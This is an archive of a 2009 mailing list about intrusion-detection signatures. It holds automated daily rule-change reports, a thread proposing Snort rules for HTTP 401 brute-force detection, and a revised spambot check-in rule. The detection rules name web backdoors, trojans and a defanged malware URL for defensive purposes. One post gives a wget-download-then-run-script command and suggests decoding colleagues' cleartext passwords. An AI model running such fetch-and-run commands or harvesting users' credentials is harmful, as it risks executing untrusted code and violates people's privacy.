        2009337 || ET WEB Possible Web Backdoor cmdasp.asp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009338 || ET WEB Possible Web Backdoor cmdasp.aspx access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009339 || ET WEB Possible Web Backdoor simple-backdoor.php access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009340 || ET WEB Possible Web Backdoor php-backdoor.php access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009341 || ET WEB Possible Web Backdoor jsp-reverse.jsp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009342 || ET WEB Possible Web Backdoor perlcmd.cgi access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009343 || ET WEB Possible Web Backdoor cmdjsp.jsp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009344 || ET WEB Possible Web Backdoor cmd-asp-5.1.asp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2500123 || ET COMPROMISED Known Compromised or Hostile Host Traffic (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500124 || ET COMPROMISED Known Compromised or Hostile Host Traffic (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500125 || ET COMPROMISED Known Compromised or Hostile Host Traffic (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500126 || ET COMPROMISED Known Compromised or Hostile Host Traffic (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500127 || ET COMPROMISED Known Compromised or Hostile Host Traffic (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500128 || ET COMPROMISED Known Compromised or Hostile Host Traffic (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500129 || ET COMPROMISED Known Compromised or Hostile Host Traffic (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500130 || ET COMPROMISED Known Compromised or Hostile Host Traffic (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500131 || ET COMPROMISED Known Compromised or Hostile Host Traffic (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500132 || ET COMPROMISED Known Compromised or Hostile Host Traffic (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500133 || ET COMPROMISED Known Compromised or Hostile Host Traffic (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500134 || ET COMPROMISED Known Compromised or Hostile Host Traffic (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500135 || ET COMPROMISED Known Compromised or Hostile Host Traffic (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500136 || ET COMPROMISED Known Compromised or Hostile Host Traffic (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500137 || ET COMPROMISED Known Compromised or Hostile Host Traffic (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500138 || ET COMPROMISED Known Compromised or Hostile Host Traffic (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510123 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510124 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510125 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510126 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510127 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510128 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510129 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510130 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510131 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510132 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510133 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510134 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510135 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510136 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510137 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510138 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Added to emerging-web.rules (1):
        #by Jaime Blasco

[---]     Removed non-rule lines:    [---]

     -> Removed from emerging-drop-BLOCK.rules (2):
        #  VERSION 1527
        #  Generated 2009-05-02 00:03:03 EDT

     -> Removed from emerging-drop.rules (2):
        #  VERSION 1527
        #  Generated 2009-05-02 00:03:03 EDT

     -> Removed from emerging-rbn-BLOCK.rules (2):
        #  VERSION 127
        #  Updated 2009-04-29 09:08:59

     -> Removed from emerging-rbn.rules (2):
        #  VERSION 127
        #  Updated 2009-04-29 09:08:59

     -> Removed from emerging-sid-msg.map (5):
        2009288 || ET WEB PHP Attack Tool Revolt Scanner || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Revolt_Scanner || url,doc.emergingthreats.net/2009288 || url,www.Whitehatsecureityresponse.blogspot.com
        2009296 || ET TROJAN Banker/Banbra Related HTTP Post-infection Checkin
        2009297 || ET TROJAN Boaxxe HTTP POST Checkin
        2009298 || ET SCAN Port Unreachable Response to Xprobe2 OS Fingerprint Scan || url,xprobe.sourceforge.net/
        2009299 || ET TROJAN General Trojan Downloader

     -> Removed from emerging-sid-msg.map.txt (5):
        2009288 || ET WEB PHP Attack Tool Revolt Scanner || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Revolt_Scanner || url,doc.emergingthreats.net/2009288 || url,www.Whitehatsecureityresponse.blogspot.com
        2009296 || ET TROJAN Banker/Banbra Related HTTP Post-infection Checkin
        2009297 || ET TROJAN Boaxxe HTTP POST Checkin
        2009298 || ET SCAN Port Unreachable Response to Xprobe2 OS Fingerprint Scan || url,xprobe.sourceforge.net/
        2009299 || ET TROJAN General Trojan Downloader


From emerging at emergingthreats.net  Sun May 10 16:00:10 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sun, 10 May 2009 16:00:10 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090510200010.BEF764504D@goliath.jonkmans.com>


[***] Results from Oinkmaster started Sun May 10 16:00:10 2009 [***]

[*] Rules modifications: [*]
    None.

[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-sid-msg.map (2):
        2500139 || ET COMPROMISED Known Compromised or Hostile Host Traffic (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510139 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Added to emerging-sid-msg.map.txt (2):
        2500139 || ET COMPROMISED Known Compromised or Hostile Host Traffic (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510139 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts


From jaime.blasco at alienvault.com  Mon May 11 06:58:15 2009
From: jaime.blasco at alienvault.com (Jaime Blasco)
Date: Mon, 11 May 2009 12:58:15 +0200
Subject: [Emerging-Sigs] ET ATTACK-RESPONSES 401 Unauthorized
Message-ID: <53834cf20905110358x4ce3a876t3f95b5db33a4bb46@mail.gmail.com>

Hi!,

I've been detecting some activity related to router's authentication
bruteforce. We haven't got a rule to detect 401 error responses
(Unauthorized) so what about something like this?:

alert tcp $HTTP_SERVERS $HTTP_PORTS -> $EXTERNAL_NET any (msg:"ET
ATTACK-RESPONSES 401 Unauthorized"; flow:from_server,established;
content:"HTTP/1.1 401"; depth:12; classtype:attempted-recon; sid:; rev:1;)

Regards

-- 
_______________________________

Jaime Blasco

www.ossim.com
www.alienvault.com
Email: jaime.blasco at alienvault.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090511/b6834676/attachment.html

From jonkman at jonkmans.com  Mon May 11 09:20:03 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Mon, 11 May 2009 09:20:03 -0400
Subject: [Emerging-Sigs] ET ATTACK-RESPONSES 401 Unauthorized
In-Reply-To: <53834cf20905110358x4ce3a876t3f95b5db33a4bb46@mail.gmail.com>
References: <53834cf20905110358x4ce3a876t3f95b5db33a4bb46@mail.gmail.com>
Message-ID: <4A082603.7030305@jonkmans.com>

That's a darn good idea. Funny the simple things that none of us have
thought of yet...

Posting now. Thanks Jaime!

Matt

Jaime Blasco wrote:
> Hi!,
> 
> I've been detecting some activity related to router's authentication
> bruteforce. We haven't got a rule to detect 401 error responses
> (Unauthorized) so what about something like this?:
> 
> alert tcp $HTTP_SERVERS $HTTP_PORTS -> $EXTERNAL_NET any (msg:"ET
> ATTACK-RESPONSES 401 Unauthorized"; flow:from_server,established;
> content:"HTTP/1.1 401"; depth:12; classtype:attempted-recon; sid:; rev:1;)
> 
> Regards
> 
> -- 
> _______________________________
> 
> Jaime Blasco
> 
> www.ossim.com <http://www.ossim.com>
> www.alienvault.com <http://www.alienvault.com>
> Email: jaime.blasco at alienvault.com <mailto:jaime.blasco at alienvault.com>
> 
> 
> ------------------------------------------------------------------------
> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From pepperjack at afferentsecurity.com  Mon May 11 09:54:36 2009
From: pepperjack at afferentsecurity.com (Jack Pepper)
Date: Mon, 11 May 2009 08:54:36 -0500
Subject: [Emerging-Sigs] ET ATTACK-RESPONSES 401 Unauthorized
In-Reply-To: <53834cf20905110358x4ce3a876t3f95b5db33a4bb46@mail.gmail.com>
References: <53834cf20905110358x4ce3a876t3f95b5db33a4bb46@mail.gmail.com>
Message-ID: <20090511085436.o1dsklr42sw44k80@mail.afferentsecurity.com>

Quoting Jaime Blasco <jaime.blasco at alienvault.com>:

> Hi!,
>
> I've been detecting some activity related to router's authentication
> bruteforce. We haven't got a rule to detect 401 error responses
> (Unauthorized) so what about something like this?:
>
> alert tcp $HTTP_SERVERS $HTTP_PORTS -> $EXTERNAL_NET any (msg:"ET
> ATTACK-RESPONSES 401 Unauthorized"; flow:from_server,established;
> content:"HTTP/1.1 401"; depth:12; classtype:attempted-recon; sid:; rev:1;)

A single 401 all by itself is not significant.  Perhaps add a  
threshold to detect the brute force attack.

Really, I think (since we are one the 401 idea), that if the sensor is  
detecting a 401 at all indicates that the web site is accepting user  
credentials in the clear.  So maybe two rules here:
  -- one for a flurry of 401s indicating a brute force attack
  -- another for "web site passes user credentials in the clear

jp

-- 

Framework?  I don't need no stinking framework!

----------------------------------------------------------------
@fferent Security Labs:  Isolate/Insulate/Innovate  
http://www.afferentsecurity.com


From jonkman at jonkmans.com  Mon May 11 10:18:33 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Mon, 11 May 2009 10:18:33 -0400
Subject: [Emerging-Sigs] ET ATTACK-RESPONSES 401 Unauthorized
In-Reply-To: <20090511085436.o1dsklr42sw44k80@mail.afferentsecurity.com>
References: <53834cf20905110358x4ce3a876t3f95b5db33a4bb46@mail.gmail.com>
	<20090511085436.o1dsklr42sw44k80@mail.afferentsecurity.com>
Message-ID: <4A0833B9.1040808@jonkmans.com>

Good ideas Jack. I did that when I committed. One sig for individual
hits, and a threshold to indicate some brute forcing.

That ought to let folks use the one that best fits them!

Thanks

Matt

Jack Pepper wrote:
> Quoting Jaime Blasco <jaime.blasco at alienvault.com>:
> 
>> Hi!,
>>
>> I've been detecting some activity related to router's authentication
>> bruteforce. We haven't got a rule to detect 401 error responses
>> (Unauthorized) so what about something like this?:
>>
>> alert tcp $HTTP_SERVERS $HTTP_PORTS -> $EXTERNAL_NET any (msg:"ET
>> ATTACK-RESPONSES 401 Unauthorized"; flow:from_server,established;
>> content:"HTTP/1.1 401"; depth:12; classtype:attempted-recon; sid:; rev:1;)
> 
> A single 401 all by itself is not significant.  Perhaps add a  
> threshold to detect the brute force attack.
> 
> Really, I think (since we are one the 401 idea), that if the sensor is  
> detecting a 401 at all indicates that the web site is accepting user  
> credentials in the clear.  So maybe two rules here:
>   -- one for a flurry of 401s indicating a brute force attack
>   -- another for "web site passes user credentials in the clear
> 
> jp
> 

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From jonkman at jonkmans.com  Mon May 11 10:52:23 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Mon, 11 May 2009 10:52:23 -0400
Subject: [Emerging-Sigs] Spambot detection on 2008189, mod
In-Reply-To: <839aec700905081322jecb8b06sc54cacdc89ba4252@mail.gmail.com>
References: <839aec700905081322jecb8b06sc54cacdc89ba4252@mail.gmail.com>
Message-ID: <4A083BA7.5050700@jonkmans.com>

Good catch Darren. I'll post the change now.

Thanks!

Matt

Darren Spruell wrote:
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
> SpamTool.Win32.Agent.gy Or Similar HTTP Checkin";
> flow:established,to_server; uricontent:"alive.php?id="; nocase;
> uricontent:"&tick="; nocase; uricontent:"&ver="; nocase;
> uricontent:"&smtp="; nocase; classtype:trojan-activity;
> reference:url,doc.emergingthreats.net/2008189;
> reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_General_Spamtools;
> sid:2008189; rev:2;)
> 
> Caught a report mentioning request as follows:
> 
> hxxp://91.207.4.138/spm/page.php?id=&tick=108484&ver=100&smtp=ok&task=0
> 
> 
> ...so relying on the script name breaks this. Alteration?:
> 
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
> SpamTool.Win32.Agent.gy Or Similar HTTP Checkin";
> flow:established,to_server; uricontent:"?id="; nocase;
> uricontent:"&tick="; nocase; uricontent:"&ver="; nocase;
> uricontent:"&smtp="; nocase; classtype:trojan-activity;
> reference:url,doc.emergingthreats.net/2008189;
> reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_General_Spamtools;
> sid:2008189; rev:3;)
> 
> Above is probably still specific enough without worrying about the
> maybe recently added 'tick' parameter...
> 

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From wkitty42 at windstream.net  Mon May 11 13:13:00 2009
From: wkitty42 at windstream.net (waldo kitty)
Date: Mon, 11 May 2009 13:13:00 -0400
Subject: [Emerging-Sigs] ET ATTACK-RESPONSES 401 Unauthorized
In-Reply-To: <20090511085436.o1dsklr42sw44k80@mail.afferentsecurity.com>
References: <53834cf20905110358x4ce3a876t3f95b5db33a4bb46@mail.gmail.com>
	<20090511085436.o1dsklr42sw44k80@mail.afferentsecurity.com>
Message-ID: <4A085C9C.8010101@windstream.net>

Jack Pepper wrote:
> A single 401 all by itself is not significant.  Perhaps add a  
> threshold to detect the brute force attack.
> 
> Really, I think (since we are one the 401 idea), that if the sensor is  
> detecting a 401 at all indicates that the web site is accepting user  
> credentials in the clear.  So maybe two rules here:
>   -- one for a flurry of 401s indicating a brute force attack
>   -- another for "web site passes user credentials in the clear

i do something very similar to catch and block brute force ftp login attempts... 
ie: more than 5 in 30 seconds surely indicates an automated tool ;)

-- 
NOTE: NEW EMAIL ADDRESS!!

        _\/
       (@@)                      Waldo Kitty, Waldo's Place USA
__ooO_( )_Ooo_____________________ telnet://bbs.wpusa.dynip.com
_|_____|_____|_____|_____|_____|_____ http://www.wpusa.dynip.com
____|_____|_____|_____|_____|_____|____ ftp://ftp.wpusa.dynip.com
_|_Eat_SPAM_to_email_me!_YUM!__|_____ wkitty42 -at- windstream.net

From david.glosser at gmail.com  Mon May 11 13:23:08 2009
From: david.glosser at gmail.com (David Glosser)
Date: Mon, 11 May 2009 13:23:08 -0400
Subject: [Emerging-Sigs] ET ATTACK-RESPONSES 401 Unauthorized
In-Reply-To: <4A0833B9.1040808@jonkmans.com>
References: <53834cf20905110358x4ce3a876t3f95b5db33a4bb46@mail.gmail.com>
	<20090511085436.o1dsklr42sw44k80@mail.afferentsecurity.com>
	<4A0833B9.1040808@jonkmans.com>
Message-ID: <ac597e6e0905111023o68e3f879o3c0ccf40e15b3658@mail.gmail.com>

Well, after 2914 hits in a two hours here,   I'm disabling 2009345 :)
No idea what is going on, but that's another day...

Keeping the brute force one for now.


On Mon, May 11, 2009 at 10:18 AM, Matt Jonkman <jonkman at jonkmans.com> wrote:
> Good ideas Jack. I did that when I committed. One sig for individual
> hits, and a threshold to indicate some brute forcing.
>
> That ought to let folks use the one that best fits them!
>
> Thanks
>
> Matt
>
> Jack Pepper wrote:
>> Quoting Jaime Blasco <jaime.blasco at alienvault.com>:
>>
>>> Hi!,
>>>
>>> I've been detecting some activity related to router's authentication
>>> bruteforce. We haven't got a rule to detect 401 error responses
>>> (Unauthorized) so what about something like this?:
>>>
>>> alert tcp $HTTP_SERVERS $HTTP_PORTS -> $EXTERNAL_NET any (msg:"ET
>>> ATTACK-RESPONSES 401 Unauthorized"; flow:from_server,established;
>>> content:"HTTP/1.1 401"; depth:12; classtype:attempted-recon; sid:; rev:1;)
>>
>> A single 401 all by itself is not significant. ?Perhaps add a
>> threshold to detect the brute force attack.
>>
>> Really, I think (since we are one the 401 idea), that if the sensor is
>> detecting a 401 at all indicates that the web site is accepting user
>> credentials in the clear. ?So maybe two rules here:
>> ? -- one for a flurry of 401s indicating a brute force attack
>> ? -- another for "web site passes user credentials in the clear
>>
>> jp
>>
>
> --
> --------------------------------------------
> Matthew Jonkman
> Emerging Threats
> Phone 765-429-0398
> Fax 312-264-0205
> http://www.emergingthreats.net
> --------------------------------------------
>
> PGP: http://www.jonkmans.com/mattjonkman.asc
>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>

From pepperjack at afferentsecurity.com  Mon May 11 13:51:12 2009
From: pepperjack at afferentsecurity.com (Jack Pepper)
Date: Mon, 11 May 2009 12:51:12 -0500
Subject: [Emerging-Sigs] ET ATTACK-RESPONSES 401 Unauthorized
In-Reply-To: <ac597e6e0905111023o68e3f879o3c0ccf40e15b3658@mail.gmail.com>
References: <53834cf20905110358x4ce3a876t3f95b5db33a4bb46@mail.gmail.com>
	<20090511085436.o1dsklr42sw44k80@mail.afferentsecurity.com>
	<4A0833B9.1040808@jonkmans.com>
	<ac597e6e0905111023o68e3f879o3c0ccf40e15b3658@mail.gmail.com>
Message-ID: <20090511125112.r9f8fqxds04sgoc8@mail.afferentsecurity.com>

Quoting David Glosser <david.glosser at gmail.com>:

> Well, after 2914 hits in a two hours here,   I'm disabling 2009345 :)
> No idea what is going on, but that's another day...
>

whats going on is that your web site (in the destination ip) is  
permitting users to send their credentials in the clear.

Clear text passwords is real a policy problem in most organizations.   
security is easy, policy is *really* hard.

if you want to decode their userids and passwords you can download my  
base64 decoder at:
<code>
wget -O b64.tgz http://www.autoshun.org/downloads/b64.tgz
tar -xzvf b64.tgz
sh ./runme.sh
</code>
then call it as "echo amltYm9iOmNoZXNzZHVkZTQyCg== | base64decode"

Sometimes when you address people by their passwords ("hey,  
chessdude42, howz it going?") it helps get policy moving in the right  
direction.  [or gets you fired]


jp



> Keeping the brute force one for now.
>
>
> On Mon, May 11, 2009 at 10:18 AM, Matt Jonkman <jonkman at jonkmans.com> wrote:
>> Good ideas Jack. I did that when I committed. One sig for individual
>> hits, and a threshold to indicate some brute forcing.
>>
>> That ought to let folks use the one that best fits them!
>>
>> Thanks
>>
>> Matt
>>
>> Jack Pepper wrote:
>>> Quoting Jaime Blasco <jaime.blasco at alienvault.com>:
>>>
>>>> Hi!,
>>>>
>>>> I've been detecting some activity related to router's authentication
>>>> bruteforce. We haven't got a rule to detect 401 error responses
>>>> (Unauthorized) so what about something like this?:
>>>>
>>>> alert tcp $HTTP_SERVERS $HTTP_PORTS -> $EXTERNAL_NET any (msg:"ET
>>>> ATTACK-RESPONSES 401 Unauthorized"; flow:from_server,established;
>>>> content:"HTTP/1.1 401"; depth:12; classtype:attempted-recon; sid:; rev:1;)
>>>
>>> A single 401 all by itself is not significant.  Perhaps add a
>>> threshold to detect the brute force attack.
>>>
>>> Really, I think (since we are one the 401 idea), that if the sensor is
>>> detecting a 401 at all indicates that the web site is accepting user
>>> credentials in the clear.  So maybe two rules here:
>>>   -- one for a flurry of 401s indicating a brute force attack
>>>   -- another for "web site passes user credentials in the clear
>>>
>>> jp
>>>
>>
>> --
>> --------------------------------------------
>> Matthew Jonkman
>> Emerging Threats
>> Phone 765-429-0398
>> Fax 312-264-0205
>> http://www.emergingthreats.net
>> --------------------------------------------
>>
>> PGP: http://www.jonkmans.com/mattjonkman.asc
>>
>>
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
>



-- 

Framework?  I don't need no stinking framework!

----------------------------------------------------------------
@fferent Security Labs:  Isolate/Insulate/Innovate  
http://www.afferentsecurity.com


From david.glosser at gmail.com  Mon May 11 14:45:30 2009
From: david.glosser at gmail.com (David Glosser)
Date: Mon, 11 May 2009 14:45:30 -0400
Subject: [Emerging-Sigs] ET ATTACK-RESPONSES 401 Unauthorized
In-Reply-To: <20090511125112.r9f8fqxds04sgoc8@mail.afferentsecurity.com>
References: <53834cf20905110358x4ce3a876t3f95b5db33a4bb46@mail.gmail.com>
	<20090511085436.o1dsklr42sw44k80@mail.afferentsecurity.com>
	<4A0833B9.1040808@jonkmans.com>
	<ac597e6e0905111023o68e3f879o3c0ccf40e15b3658@mail.gmail.com>
	<20090511125112.r9f8fqxds04sgoc8@mail.afferentsecurity.com>
Message-ID: <ac597e6e0905111145x59b33d2fo288466cfa98f2944@mail.gmail.com>

On Mon, May 11, 2009 at 1:51 PM, Jack Pepper
<pepperjack at afferentsecurity.com> wrote:
> Quoting David Glosser <david.glosser at gmail.com>:
>
>> Well, after 2914 hits in a two hours here, ? I'm disabling 2009345 :)
>> No idea what is going on, but that's another day...
>>
>
> whats going on is that your web site (in the destination ip) is permitting
> users to send their credentials in the clear.
>

It's internal intranet and QA sites, clear credentials is a battle for
another day :)


> Clear text passwords is real a policy problem in most organizations.
> ?security is easy, policy is *really* hard.
>
> if you want to decode their userids and passwords you can download my base64
> decoder at:
> <code>
> wget -O b64.tgz http://www.autoshun.org/downloads/b64.tgz
> tar -xzvf b64.tgz
> sh ./runme.sh
> </code>
> then call it as "echo amltYm9iOmNoZXNzZHVkZTQyCg== | base64decode"
>
> Sometimes when you address people by their passwords ("hey, chessdude42,
> howz it going?") it helps get policy moving in the right direction. ?[or
> gets you fired]
>

Gotta try it... Thanks!

> jp
>
>
>
>> Keeping the brute force one for now.
>>
>>
>> On Mon, May 11, 2009 at 10:18 AM, Matt Jonkman <jonkman at jonkmans.com>
>> wrote:
>>>
>>> Good ideas Jack. I did that when I committed. One sig for individual
>>> hits, and a threshold to indicate some brute forcing.
>>>
>>> That ought to let folks use the one that best fits them!
>>>
>>> Thanks
>>>
>>> Matt
>>>
>>> Jack Pepper wrote:
>>>>
>>>> Quoting Jaime Blasco <jaime.blasco at alienvault.com>:
>>>>
>>>>> Hi!,
>>>>>
>>>>> I've been detecting some activity related to router's authentication
>>>>> bruteforce. We haven't got a rule to detect 401 error responses
>>>>> (Unauthorized) so what about something like this?:
>>>>>
>>>>> alert tcp $HTTP_SERVERS $HTTP_PORTS -> $EXTERNAL_NET any (msg:"ET
>>>>> ATTACK-RESPONSES 401 Unauthorized"; flow:from_server,established;
>>>>> content:"HTTP/1.1 401"; depth:12; classtype:attempted-recon; sid:;
>>>>> rev:1;)
>>>>
>>>> A single 401 all by itself is not significant. ?Perhaps add a
>>>> threshold to detect the brute force attack.
>>>>
>>>> Really, I think (since we are one the 401 idea), that if the sensor is
>>>> detecting a 401 at all indicates that the web site is accepting user
>>>> credentials in the clear. ?So maybe two rules here:
>>>> ?-- one for a flurry of 401s indicating a brute force attack
>>>> ?-- another for "web site passes user credentials in the clear
>>>>
>>>> jp
>>>>
>>>
>>> --
>>> --------------------------------------------
>>> Matthew Jonkman
>>> Emerging Threats
>>> Phone 765-429-0398
>>> Fax 312-264-0205
>>> http://www.emergingthreats.net
>>> --------------------------------------------
>>>
>>> PGP: http://www.jonkmans.com/mattjonkman.asc
>>>
>>>
>>> _______________________________________________
>>> Emerging-sigs mailing list
>>> Emerging-sigs at emergingthreats.net
>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>>
>>
>
>
>
> --
>
> Framework? ?I don't need no stinking framework!
>
> ----------------------------------------------------------------
> @fferent Security Labs: ?Isolate/Insulate/Innovate
> http://www.afferentsecurity.com
>
>

From emerging at emergingthreats.net  Mon May 11 16:00:10 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Mon, 11 May 2009 16:00:10 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090511200010.E761D4504D@goliath.jonkmans.com>


[***] Results from Oinkmaster started Mon May 11 16:00:10 2009 [***]

[+++]          Added rules:          [+++]

 2009345 - ET ATTACK-RESPONSE HTTP 401 Unauthorized (emerging-attack_response.rules)
 2009346 - ET ATTACK-RESPONSE Frequent HTTP 401 Unauthorized - Possible Brute Force Attack (emerging-attack_response.rules)


[///]     Modified active rules:     [///]

 2008189 - ET TROJAN SpamTool.Win32.Agent.gy/Grum/Tedroo Or Similar HTTP Checkin (emerging-virus.rules)


[---]         Removed rules:         [---]

 2002035 - ET MALWARE Better Internet Spyware User Agent Activity (thin) (emerging-malware.rules)


[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-sid-msg.map (3):
        2008189 || ET TROJAN SpamTool.Win32.Agent.gy/Grum/Tedroo Or Similar HTTP Checkin || url,securitylabs.websense.com/content/Blogs/2721.aspx || url,www.secureworks.com/research/threats/botnets2009/ || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_General_Spamtools || url,doc.emergingthreats.net/2008189
        2009345 || ET ATTACK-RESPONSE HTTP 401 Unauthorized
        2009346 || ET ATTACK-RESPONSE Frequent HTTP 401 Unauthorized - Possible Brute Force Attack

     -> Added to emerging-sid-msg.map.txt (3):
        2008189 || ET TROJAN SpamTool.Win32.Agent.gy/Grum/Tedroo Or Similar HTTP Checkin || url,securitylabs.websense.com/content/Blogs/2721.aspx || url,www.secureworks.com/research/threats/botnets2009/ || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_General_Spamtools || url,doc.emergingthreats.net/2008189
        2009345 || ET ATTACK-RESPONSE HTTP 401 Unauthorized
        2009346 || ET ATTACK-RESPONSE Frequent HTTP 401 Unauthorized - Possible Brute Force Attack

[---]     Removed non-rule lines:    [---]

     -> Removed from emerging-sid-msg.map (4):
        2002035 || ET MALWARE Better Internet Spyware User Agent Activity (thin) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_USER_Agents || url,doc.emergingthreats.net/bin/view/Main/2002035
        2008189 || ET TROJAN SpamTool.Win32.Agent.gy Or Similar HTTP Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_General_Spamtools || url,doc.emergingthreats.net/2008189
        2500139 || ET COMPROMISED Known Compromised or Hostile Host Traffic (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510139 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Removed from emerging-sid-msg.map.txt (4):
        2002035 || ET MALWARE Better Internet Spyware User Agent Activity (thin) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_USER_Agents || url,doc.emergingthreats.net/bin/view/Main/2002035
